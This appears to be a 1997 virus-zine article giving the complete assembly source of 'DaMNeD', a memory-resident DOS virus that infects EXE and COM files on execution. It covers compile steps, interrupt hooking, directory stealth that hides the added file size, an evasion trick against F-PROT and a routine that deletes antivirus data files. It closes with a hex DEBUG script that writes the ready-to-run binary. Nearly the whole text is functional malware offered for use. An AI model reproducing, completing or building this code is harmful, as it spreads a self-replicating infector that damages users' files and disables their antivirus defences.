Copy Link
Add to Bookmark
Report
SLAM3.003: Resident semi-stealth EXE/COM infector ] DaMNeD [ by DC [SLAM]
] DaMNeD Virus [
This virus is a resident semi-stealth EXE/COM infector that infect of course, on execute. However, it will restore the time/date, kill some bad files, doesn't infect av's, intercept the interrupt 24, hide your size with dta/fcb directory stealth, and works very good under Windows 95, but in the MS-DOS windows the both directory stealth doesn't works :( I'm working for a Windows95/DOS Directory Stealth...
To compile:
TASM /M DAMNED.ASM
TLINK DAMNED.OBJ
EXE2BIN DAMNED.OBJ DAMNED.COM
Delete other files:
DEL DAMNED.OBJ
DEL DAMNED.MAP
.
.model tiny
.code
jumps ; for long jumps
org 0
start: call get_delta ; get delta-offs
get_delta:
mov di,sp
mov ax,ss:[di]
mov bp,ax
sub bp,offset get_delta
push es ; save es
push ds ; save ds
mov ah,0bh ; residency check
mov bx,"SL" ;
mov cx,"AM" ; SLAM here?
int 21h
cmp ax,"OK" ; yepz
je return_file ; return from original file...
push es ; save es
mov ax,3521h ; get adress of interrupt 21
int 21h
mov word ptr cs:[i21][bp],bx ; save it
mov word ptr cs:[i21][bp][2],es
pop es ; restore es
mov ah,4ah ; routine to make resident
mov bx,-1
int 21h
sub bx,(v_size+15)/16+1
mov ah,4ah
int 21h
mov bx,(v_size+15)/16
nop
mov ah,48h
int 21h
mov es,ax
push es
pop ax
dec ax ; This routine is only for F-PROT
push ax ; cannot detect this virus a new
pop ds ; variant of CHILL! B)
xor di,di
mov ax,"Z"
mov word ptr ds:[di+0],ax
sub ax,"Z" ; AX="Z" sub AX,"Z" AX=0
add ax,0008 ; ADD AX,8 AX=8
mov word ptr ds:[di+1],ax ; Mark DOS Block
push cs ; CS=DS
pop ds
mov si,bp ; Si=OFFSET OF START
mov cx,v_size
rep movsb ; move virus
push es
pop ds
lea dx,int21 ; put resident!
mov ax,2125h
xchg ah,al
int 21h
return_file:
pop ds ; restore original
pop es ; DS and ES
cmp cs:[com_exe][bp],1 ; It's a COM or EXE file?
je return_exe ; If EXE jump to exe return
return_com:
lea si,saved_bytes+bp ; si = saved bytes
mov cx,200h
shr cx,2
shl cx,1
push cx
mov di,cx
mov cx,3
rep movsb ; move the bytes to CS:[100h]
pop cx
jmp cx ; return..
saved_bytes:
int 20h
nop
com_exe db ? ; com / exe ?
return_exe:
mov ax,es ; ax = PSP
add ax,10h ; ax = PSP+10h
add cs:[_cs+bp],ax ; save this address in CS:IP
cli
mov sp,word ptr cs:[_sp+bp] ; adjust SP
add ax,word ptr cs:[_ss+bp] ; adjust SS
mov ss,ax
sti
sub ax,ax ; zer0 regz!
sub dx,dx
xor bx,bx
sub cx,cx
xor di,di
sub si,si
db 0eah
_ip dw 00000h
_cs dw 00000h
_sp dw ?
_ss dw ?
int21:
pushf
xchg ah,al
cmp al,11h ; fcb find?
xchg ah,al
jz fcb_stealth
xchg ah,al
cmp al,12h ; fcb findnext?
xchg ah,al
jz fcb_stealth
cmp ah,4eh ; dta find?
jz dta_stealth
cmp ah,4fh ; dta findnext?
jz dta_stealth
push bx
mov bx,4b00h
cmp ax,bx ; execute?
pop bx
jz infect_file
cmp ah,0bh ; residency check?
jnz dos_1
cmp bx,"SL"
jnz dos_1
cmp cx,"AM"
jnz dos_1
mov ax,"OK" ; damned is here!
popf
iret
dos_1:
popf
dos:
db 0eah ; jmp to oldint21
i21 dd ?
ret
fcb_stealth:
push cs ; save code segment
call dos ; call int 21h
or al,al ; error?
jnz no_files ; yeah, return...
push ax bx es ; push some regs.
mov ah,51h ; get PSP
int 21h
mov es,bx
cmp bx,es:[16h] ; it's a good PSP?
jnz no_psp ; no??? return...
mov bx,dx
mov al,[bx] ; al = current drive
push ax
mov ah,2fh ; get DTA
int 21h
pop ax
inc al
jnz no_fix ; extended fcb?
add bx,7
no_fix:
mov al,byte ptr es:[bx+17h] ; get seconds field...
and al,1fh ; test for infection
cmp al,1dh ; infected?
jnz no_psp ; no? return...
hide_fsize:
sub word ptr es:[bx+1dh],v_size ; subtract v_size
; from filesize
no_psp:
pop es bx ax ; pop pushed regs...
no_files:
retf 2 ; return...
dta_stealth:
push cs ; save code segment
call dos ; call int 21h
jc no_files2 ; err? no files found
pushf ; save flags and
push ax bx es ; some regs.
mov ah,2fh ; get the DTA to es:bx
int 21h
mov ax,es:[bx+16h] ; get the time
and al,1fh ; unmask seconds
cmp al,1dh ; infected?
jnz not_inf ; no? return
hide: sub word ptr es:[bx+1ah],v_size ; subtract the vsize
; from filesize
not_inf:
pop es bx ax ; pop the pushed regs
popf ; restore flags...
no_files2:
retf 2
i24 dd ? ; original int24
buffer db 6 dup("SLAM") ; buffer = 6 * 4 bytes "SLAM"
f_size dd ? ; buffer = 24(dec) 18(hex)
f_name dd ?
time dw ?
date dw ?
no_bad dw 8 ; number os bad files...
file db 13 dup (0)
bad db "ANTI-VIR.DAT",0 ; bad files...
db "CHKLIST.CPS",0
db "CHKLIST.MS",0
db "AVP.SET",0
db "FINDVIRU.DRV",0
db "AVP.OVL",0
db "SCAN.DAT",0
db "SIGN.DEF",0
infect_file:
push ax bx cx dx ds es di si ; push some regs...
mov word ptr cs:[f_name],dx ; save executed file
mov word ptr cs:[f_name][2],ds
call check_for_av ; check for av's...
jc exit_now ; don't infect...
mov ax,3524h ; get error handler.
int 21h
mov word ptr cs:[i24],bx ; save it
mov word ptr cs:[i24][2],es
mov ax,2425h ; put the new int24
push cs
pop ds
lea dx,error_handler
xchg al,ah
int 21h
mov dx,word ptr cs:[f_name] ; restore filename
mov ds,word ptr cs:[f_name][2]
mov ax,3D02h ; open it R/W acess
int 21h
mov bx,ax ; handle = AX = BX
push cs cs
pop es ds
mov ax,5700h ; get time
int 21h
mov word ptr cs:[time],cx
mov word ptr cs:[date],dx
and cl,1fh ; unmask secs.
cmp cl,1dh ; infected?!?!
je close_exit ; hmmm, next...
mov ax,3f00h ; read file...
lea dx,buffer
mov cx,18h ; 18h bytes (24 dec)
int 21h
mov ax,4202h ; go to -EOF-
mov cx,ax
sub cx,4202h
mov dx,cx
int 21h
mov word ptr cs:[f_size],ax ; save filesize
mov word ptr cs:[f_size][2],dx
mov cl,byte ptr buffer ; MZ signature check
add cl,byte ptr buffer+1
mov al,"M"
add al,"Z"
cmp al,cl
je infect_exe
mov ax,word ptr cs:[f_size] ; sub ax,3 ;)
sub ax,8
add ax,5
lea si,buffer ; save orig. bytes
lea di,saved_bytes
movsw
movsb
mov cl,0e9h ; cl = jump
mov byte ptr buffer,cl ; put the jmp
mov word ptr buffer+1,ax ; in the buffer
mov cs:[com_exe],0 ; mark! it's a com
mov ah,3fh ; write virus
lea dx,start
mov cx,v_size
inc ah
int 21h
mov ax,4200h ; go to -SOF-
mov cx,ax
sub cx,4200h
mov dx,cx
int 21h
mov ah,3fh ; write the header
lea dx,buffer ; (jump+large)
mov cx,3
inc ah ;
int 21h
close_exit:
mov ax,5700h ; write the new time
mov cx,word ptr cs:[time]
mov dx,word ptr cs:[date]
or cl,1dh
and cl,0fdh
inc al
int 21h
exit_close:
mov ax,3e00h ; close file
int 21h
lea si,bad ; bad files...
mov cx,cs:[no_bad] ; cx=number of files
ext:
lea di,file ; di=offset of file
fuck_av:
lodsb
cmp al,0
jz delete
stosb
jmp fuck_av
delete:
xor al,al
stosb
push cx
mov ax,4300h ; set attribs...
inc al
xor cx,cx
lea dx,file
int 21h
mov ah,41h ; delete bad file...
lea dx,file
int 21h
pop cx
loop ext
mov ax,2425h ; restore the new i24
mov dx,word ptr cs:[i24] ; handler
mov ds,word ptr cs:[i24][2]
xchg ah,al
int 21h
exit_now:
pop si di es ds dx cx bx ax
jmp dos_1
db 0
db "DaMNeD Virus (c) 1997, Dark Chakal [SLAM]"
db 0
infect_exe:
cmp word ptr buffer+18h,"@" ; it's a WiNEXE?
jz exit_close ; yepz!
cmp word ptr buffer+12h,"DC" ; second infection
jz exit_close ; marker...
mov ax,word ptr cs:[f_size] ; restore f_size
mov dx,word ptr cs:[f_size][2]
mov cx,word ptr [buffer+14h] ; save CS:IP
mov cs:[_ip],cx
mov cx,word ptr [buffer+16h]
mov cs:[_cs],cx
mov cx,word ptr [buffer+10h] ; save SS:SP
mov cs:[_sp],cx
mov cx,word ptr [buffer+0eh]
mov cs:[_ss],cx
mov cx,word ptr [buffer+8] ; convert header size
shl cx,4 ; to paragrafs...
sub ax,cx ; sub from filesize
sbb dx,0
mov cx,10h ; divide by paragrafs...
div cx
mov word ptr [buffer+14h],dx ; put the new IP
mov word ptr [buffer+16h],ax ; put the new CS
mov word ptr [buffer+12h],"DC" ; put the inf. mark.
; Dark Chakal ;)
mov ax,word ptr cs:[f_size] ; restore filesize
mov dx,word ptr cs:[f_size][2]
add ax,v_size ; ax=filesize+v_size
adc dx,0
mov cx,200h ; divide by pages
div cx
or dx,dx ; it's same page?
jz none ; yepz, no increment
inc ax
none:
mov word ptr [buffer+2],dx ; save it
mov word ptr [buffer+4],ax
mov cs:[com_exe],1 ; mark! it's a exe file
mov ah,3fh ; write virus
lea dx,start
mov cx,v_size
inc ah
int 21h
mov ax,4200h ; go to -SOF-
mov cx,ax
sub cx,ax
mov dx,cx
int 21h
mov ah,3fh ; write buffer (header)
lea dx,buffer
mov cx,18h
inc ah
int 21h
jmp close_exit
check_for_av:
mov si,dx
check_av:
lodsb
cmp al,"."
jnz check_av
lodsw
cmp ax,"XE"
jnz good
lodsb
cmp ax,"E"
jnz good
sub si,6
lodsw
cmp ax,"VA"
jz av_found
sub si,2
lodsw
cmp ax,"NA"
jz av_found
sub si,2
lodsw
cmp ax,"OT"
jz av_found
good: clc
ret
av_found:
stc
ret
error_handler:
mov al,3
iret
v_size equ $-start
end start
====That's for everyone without a assembler=================================
N DAMNED.COM
E 0100 E8 00 00 8B FC 36 8B 05 8B E8 81 ED 03 00 06 1E
E 0110 B4 0B BB 4C 53 B9 4D 41 CD 21 3D 4B 4F 74 53 06
E 0120 B8 21 35 CD 21 2E 89 9E 04 01 2E 8C 86 06 01 07
E 0130 B4 4A BB FF FF CD 21 83 EB 46 B4 4A CD 21 BB 45
E 0140 00 90 B4 48 CD 21 8E C0 06 58 48 50 1F 33 FF B8
E 0150 5A 00 89 05 2D 5A 00 05 08 00 89 45 01 0E 1F 8B
E 0160 F5 B9 45 04 F3 A4 06 1F BA C5 00 B8 25 21 86 E0
E 0170 CD 21 1F 07 2E 80 BE 97 00 01 74 1C 8D B6 94 00
E 0180 B9 00 02 D1 E9 D1 E9 D1 E1 51 8B F9 B9 03 00 F3
E 0190 A4 59 FF E1 CD 20 90 00 8C C0 05 10 00 2E 01 86
E 01A0 BF 00 FA 2E 8B A6 C1 00 2E 03 86 C3 00 8E D0 FB
E 01B0 2B C0 2B D2 33 DB 2B C9 33 FF 2B F6 EA 00 00 00
E 01C0 00 00 00 00 00 9C 86 E0 3C 11 86 E0 74 3B 86 E0
E 01D0 3C 12 86 E0 74 33 80 FC 4E 74 6D 80 FC 4F 74 68
E 01E0 53 BB 00 4B 3B C3 5B 75 03 E9 0B 01 80 FC 0B 75
E 01F0 11 81 FB 4C 53 75 0B 81 F9 4D 41 75 05 B8 4B 4F
E 0200 9D CF 9D EA 00 00 00 00 C3 0E E8 F6 FF 0A C0 75
E 0210 34 50 53 06 B4 51 CD 21 8E C3 26 3B 1E 16 00 75
E 0220 21 8B DA 8A 07 50 B4 2F CD 21 58 FE C0 75 03 83
E 0230 C3 07 26 8A 47 17 24 1F 3C 1D 75 06 26 81 6F 1D
E 0240 45 04 07 5B 58 CA 02 00 0E E8 B7 FF 72 1C 9C 50
E 0250 53 06 B4 2F CD 21 26 8B 47 16 24 1F 3C 1D 75 06
E 0260 26 81 6F 1A 45 04 07 5B 58 9D CA 02 00 00 00 00
E 0270 00 53 4C 41 4D 53 4C 41 4D 53 4C 41 4D 53 4C 41
E 0280 4D 53 4C 41 4D 53 4C 41 4D 00 00 00 00 00 00 00
E 0290 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00
E 02A0 00 00 00 00 41 4E 54 49 2D 56 49 52 2E 44 41 54
E 02B0 00 43 48 4B 4C 49 53 54 2E 43 50 53 00 43 48 4B
E 02C0 4C 49 53 54 2E 4D 53 00 41 56 50 2E 53 45 54 00
E 02D0 46 49 4E 44 56 49 52 55 2E 44 52 56 00 41 56 50
E 02E0 2E 4F 56 4C 00 53 43 41 4E 2E 44 41 54 00 53 49
E 02F0 47 4E 2E 44 45 46 00 50 53 51 52 1E 06 57 56 2E
E 0300 89 16 8D 01 2E 8C 1E 8F 01 E8 04 02 73 03 E9 1B
E 0310 01 B8 24 35 CD 21 2E 89 1E 6D 01 2E 8C 06 6F 01
E 0320 B8 25 24 0E 1F BA 42 04 86 C4 CD 21 2E 8B 16 8D
E 0330 01 2E 8E 1E 8F 01 B8 02 3D CD 21 8B D8 0E 0E 07
E 0340 1F B8 00 57 CD 21 2E 89 0E 91 01 2E 89 16 93 01
E 0350 80 E1 1F 80 F9 1D 74 7A B8 00 3F BA 71 01 B9 18
E 0360 00 CD 21 B8 02 42 8B C8 81 E9 02 42 8B D1 CD 21
E 0370 2E A3 89 01 2E 89 16 8B 01 8A 0E 71 01 02 0E 72
E 0380 01 B0 4D 04 5A 3A C1 75 03 E9 D6 00 2E A1 89 01
E 0390 2D 08 00 05 05 00 BE 71 01 BF 94 00 A5 A4 B1 E9
E 03A0 88 0E 71 01 A3 72 01 2E C6 06 97 00 00 B4 3F BA
E 03B0 00 00 B9 45 04 FE C4 CD 21 B8 00 42 8B C8 81 E9
E 03C0 00 42 8B D1 CD 21 B4 3F BA 71 01 B9 03 00 FE C4
E 03D0 CD 21 B8 00 57 2E 8B 0E 91 01 2E 8B 16 93 01 80
E 03E0 C9 1D 80 E1 FD FE C0 CD 21 B8 00 3E CD 21 BE A4
E 03F0 01 2E 8B 0E 95 01 BF 97 01 AC 3C 00 74 03 AA EB
E 0400 F8 32 C0 AA 51 B8 00 43 FE C0 33 C9 BA 97 01 CD
E 0410 21 B4 41 BA 97 01 CD 21 59 E2 DB B8 25 24 2E 8B
E 0420 16 6D 01 2E 8E 1E 6F 01 86 E0 CD 21 5E 5F 07 1F
E 0430 5A 59 5B 58 E9 CB FD 00 44 61 4D 4E 65 44 20 56
E 0440 69 72 75 73 20 28 63 29 20 31 39 39 37 2C 20 44
E 0450 61 72 6B 20 43 68 61 6B 61 6C 20 5B 53 4C 41 4D
E 0460 5D 00 83 3E 89 01 40 74 80 81 3E 83 01 43 44 75
E 0470 03 E9 75 FF 2E A1 89 01 2E 8B 16 8B 01 8B 0E 85
E 0480 01 2E 89 0E BD 00 8B 0E 87 01 2E 89 0E BF 00 8B
E 0490 0E 81 01 2E 89 0E C1 00 8B 0E 7F 01 2E 89 0E C3
E 04A0 00 8B 0E 79 01 D1 E1 D1 E1 D1 E1 D1 E1 2B C1 83
E 04B0 DA 00 B9 10 00 F7 F1 89 16 85 01 A3 87 01 C7 06
E 04C0 83 01 43 44 2E A1 89 01 2E 8B 16 8B 01 05 45 04
E 04D0 83 D2 00 B9 00 02 F7 F1 0B D2 74 01 40 89 16 73
E 04E0 01 A3 75 01 2E C6 06 97 00 01 B4 3F BA 00 00 B9
E 04F0 45 04 FE C4 CD 21 B8 00 42 8B C8 2B C8 8B D1 CD
E 0500 21 B4 3F BA 71 01 B9 18 00 FE C4 CD 21 E9 C2 FE
E 0510 8B F2 AC 3C 2E 75 FB AD 3D 45 58 75 21 AC 3D 45
E 0520 00 75 1B 83 EE 06 AD 3D 41 56 74 14 83 EE 02 AD
E 0530 3D 41 4E 74 0B 83 EE 02 AD 3D 54 4F 74 02 F8 C3
E 0540 F9 C3 B0 03 CF
RCX
0445
W
Q
===========================================================================